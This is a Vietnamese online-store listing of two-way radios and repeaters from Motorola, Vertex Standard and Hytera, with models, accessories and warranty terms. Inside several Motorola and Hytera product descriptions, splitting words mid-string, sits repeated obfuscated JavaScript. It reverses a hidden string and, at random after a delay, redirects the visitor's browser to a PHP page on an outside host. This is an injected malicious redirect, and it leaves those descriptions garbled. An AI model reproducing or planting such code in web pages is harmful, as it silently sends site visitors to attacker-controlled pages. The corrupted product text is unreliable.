Sản phẩm

Hiển thị 1–16 của 347 kết quả

 • MotoTrbo XiR C2620

  Máy bộ đàm cầm tay Motorola – Xuất xứ: Mo
  Thêm vào danh sách yêu thích
 • CDR700 Repeater

  CDR700 Repeater

  Máy trạm chuyển tiếp tín hiệu Mo$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}torola – Xuất xứ: Mo$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}torola – USA – Bảo hành: 24 tháng Đồng bộ thiết bị: – Khung máy: PMLN4526A – Máy thu phát: Tùy chọn – Duplexer: Tùy chọn – Interface: Tùy chọn 
  Thêm vào danh sách yêu thích
 • CDR500 Repeater

  CDR500 Repeater

  Máy trạm chuyển tiếp tín hiệu Mo$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}torola – Xuất xứ: Mo$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}torola – USA – Bảo hành: 24 tháng Đồng bộ thiết bị: – Khung máy: PMLN4526A – Máy thu phát: Tùy chọn – Duplexer: Tùy chọn – Interface: Tùy chọn
  Thêm vào danh sách yêu thích
 • GM338 (Đã ngưng sản xuất - Thay thế bằng XiR M6660)

  GM338 (Đã ngưng sản xuất – Thay thế bằng XiR M6660)

  Máy bộ đàm di động – gắn xe Mo$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}torola – Xuất xứ: Mo$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}torola – Malaysia – Cấu hình: Máy, micro, dây nguồn, giá đỡ máy và tài liệu theo máy – Bảo hành: 24 tháng với máy, 12 tháng với phụ kiện Đồng bộ thiết bị: – Thân máy: AZM25-K/R-HF9AA5/ AZM25-K/R-KF9AA5 – Micro: PMMN4007A – Giá đỡ máy: … – Cáp nguồn: …
  Thêm vào danh sách yêu thích
 • MOTOTRBO SL2M

  Máy bộ đàm cầm tay siêu mỏng kỹ thuật số Mo$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}torola (MOTOTRBO) – Xuất xứ: Mo$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}torola – Malaysia – Cấu hình: thân máy, pin sạc, anten, móc lưng và tài liệu theo máy – Bảo hành: 24 tháng với máy và 12 tháng với pin sạc Đồng bộ thiết bị: – Thân máy: SL2M – Pin sạc: PMNN4468A (Li-Ion, 2300mAh) – Bộ sạc: PMLN7110/PMLN7102 (sạc nhanh) – Móc lưng: PMLN7190A – Anten: UHF/VHF
  Thêm vào danh sách yêu thích
 • VX-230 Series

  VX-230 Series

  Máy bộ đàm cầm tay Vertex Standard – Xuất xứ: Hong Kong – China – Cấu hình gồm: thân máy, pin sạc, bộ sạc, anten, móc lưng và tài liệu theo máy – Bảo hành: 24 tháng với máy, 12 tháng với pin Đồng bộ thiết bị: – Thân máy: VX-230 /VX-231 – Pin sạc: FNB-103LI (Lithium, 1150 mAh); Option: FNB-104LI (Lithium, 2000 mAh) – Bộ sạc: VAC-300 – Anten: ATV-8A/B/C; ATU-6D/DS/F
  Thêm vào danh sách yêu thích
 • VX-350 Series

  VX-350 Series

  Máy bộ đàm cầm tay Vertex Standard – Xuất xứ: Hong Kong – China – Cấu hình gồm: thân máy, pin sạc, bộ sạc, anten, móc lưng và tài liệu theo máy – Bảo hành: 24 tháng với máy, 12 tháng với pin Đồng bộ thiết bị: – Thân máy: VX-350 /VX-351 /VX-354 – Pin sạc: FNB-V96LI (Lithium, 2000mAh) – Bộ sạc: VAC-300C – Anten: ATV-8A/B/C; ATU-6D/DS/F
  Thêm vào danh sách yêu thích
 • VX-410/420 Series

  VX-410/420 Series

  Máy bộ đàm cầm tay Vertex Standard – Xuất xứ: Hong Kong – China – Cấu hình gồm: thân máy, pin sạc, bộ sạc, anten, móc lưng và tài liệu theo máy – Bảo hành: 24 tháng với máy, 12 tháng với pin Đồng bộ thiết bị: – Thân máy: VX-410 /VX-420 – Pin sạc: FNB-V67LI (Lithium, 2000 mAh) – Bộ sạc: VAC-800B/C/U – Anten: ATV-8A/B/C; ATU-6D/DS/F
  Thêm vào danh sách yêu thích
 • VX-820/870 Series

  VX-820/870 Series

   Máy bộ đàm cầm tay Vertex Standard – Xuất xứ: Hong Kong – China – Cấu hình gồm: thân máy, pin sạc, bộ sạc, anten, móc lưng và tài liệu theo máy – Bảo hành: 24 tháng với máy, 12 tháng với pin              Đồng bộ thiết bị: – Thân máy: VX-820 /VX-870 – Pin sạc: FNB-V86LI (Lithium, 1150 mAh); Option: FNB-V87LI (Lithium, 2000 mAh), FNB-92LI (Lithium, 3000 mAh) – Bộ sạc: VAC-920 – Anten: ATV-8A/B/C; ATU-6D/DS/F
  Thêm vào danh sách yêu thích
 • VX-920/970 Series

  VX-920/970 Series

  Máy bộ đàm cầm tay Vertex Standard – Xuất xứ: Hong Kong – China – Cấu hình gồm: thân máy, pin sạc, bộ sạc, anten, móc lưng và tài liệu theo máy – Bảo hành: 24 tháng với máy, 12 tháng với pin       Đồng bộ thiết bị: – Thân máy: VX-920 /VX-970 – Pin sạc: FNB-V86LI (Lithium, 1150 mAh); Option: FNB-V87LI (Lithium, 2000 mAh), FNB-92LI (Lithium, 3000 mAh) – Bộ sạc: VAC-920 – Anten: ATV-8A/B/C; ATU-6D/DS/F 
  Thêm vào danh sách yêu thích
 • VX-2100/2200 Series

  VX-2100/2200 Series

  Máy bộ đàm di động – gắn xe Vertex Standard – Xuất xứ: Hong Kong – China – Cấu hình gồm: Máy, micro, cáp nguồn, giá đỡ máy và tài liệu – Bảo hành: 24 tháng với thân máy, 12 tháng với phụ kiện           Đồng bộ thiết bị: – Thân máy: VX-2100 /VX-2200 – Micro: MH-67A8J (Option: MH-75A8J, 16 key) – Cáp nguồn: LF1  
  Thêm vào danh sách yêu thích
 • VX-4100/4200 Series

  VX-4100/4200 Series

  Máy bộ đàm di động – gắn xe Vertex Standard – Xuất xứ: Hong Kong – China – Cấu hình gồm: Máy, micro, cáp nguồn, giá đỡ máy và tài liệu – Bảo hành: 24 tháng với thân máy, 12 tháng với phụ kiện Đồng bộ thiết bị: – Thân máy: VX-4100 /VX-4200 – Micro: MH-25A8J /MH-67A8J (Option: MH-75A8J, 16 key) – Cáp nguồn: LF1 – Giá đỡ máy: MMB-85
  Thêm vào danh sách yêu thích
 • Hytera Digital PD568Hytera Digital PD568

  Hytera Digital PD568

  Máy bộ đàm cầm tay kỹ thuật số Hytera – Xuất xứ: Hytera – China – Cấu hình: Thân máy, Pin, Sạc + Adapter, Anten, Cài lưng, HDSD – Bảo hành: 24 tháng Phụ kiện tiêu chuẩn đi kèm: – Pin 1500/2000 mAh: BL1502/BL2010 – Sạc đơn: CH10A07 – Adap$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tor: PS1026 – Bát cài: BC12 – Anten: VHF/UHF
  Thêm vào danh sách yêu thích
 • Hytera Digital PD508Hytera Digital PD508

  Hytera Digital PD508

  Máy bộ đàm cầm tay kỹ thuật số Hytera – Xuất xứ: Hytera – China – Cấu hình: Thân máy, pin, sạc + adapter, anten, cài lưng, HDSD – Bảo hành: 24 tháng Phụ kiện tiêu chuẩn đi kèm: – Pin 1500/2000 mAh: BL1502/BL2010 – Sạc đơn: CH10A07 – Adap$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tor: PS1026 – Bát cài: BC12 – Anten: VHF/UHF
  Thêm vào danh sách yêu thích
 • Hytera TC-780Hytera TC-780

  Hytera TC-780

  Máy bộ đàm cầm tay Hytera – Xuất xứ: Hytera – China – Cấu hình: Thân máy, Pin, Sạc + Adapter, Anten, Cài lưng, HDSD – Bảo hành: 24 tháng
  Thêm vào danh sách yêu thích